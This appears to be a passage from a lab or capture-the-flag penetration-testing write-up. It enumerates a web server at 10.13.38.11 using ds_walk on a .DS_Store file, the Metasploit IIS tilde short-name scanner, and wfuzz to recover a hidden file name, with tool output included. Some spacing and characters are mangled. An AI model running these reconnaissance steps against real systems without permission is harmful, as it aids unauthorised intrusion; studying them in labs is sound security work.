If we discover a .ds_store file, we can use ds_walk to enumerate sensitive information.
gitclonehttps://github.com/Keramas/DS_Walk.git
python3ds_walk.py-uhttp://10.13.38.11
IIS Tilde Enumeration
msf6auxiliary(scanner/http/iis_shortname_scanner) >run[*] Running module against 10.13.38.11[*] Scanning in progress...[*] No directories were found[+] Found 1 files[+] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_co*~1.txt*[*] Auxiliary module execution completed
Fuzzing the poo_co file.
grep'^co.*'directory-list-2.3-medium.txt>fuzz.txt
Using WFUZZ.
โโโ(rootใฟkali)โโ#wfuzz-zfile,fuzz.txt-t50--sc200-uhttp://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt********************************************************* Wfuzz 3.1.0 - The Web Fuzzer *********************************************************Target:http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txtTotalrequests:2557=====================================================================ID Response Lines Word Chars Payload
=====================================================================000000319: 200 6 L 7 W 142 Ch "connection"
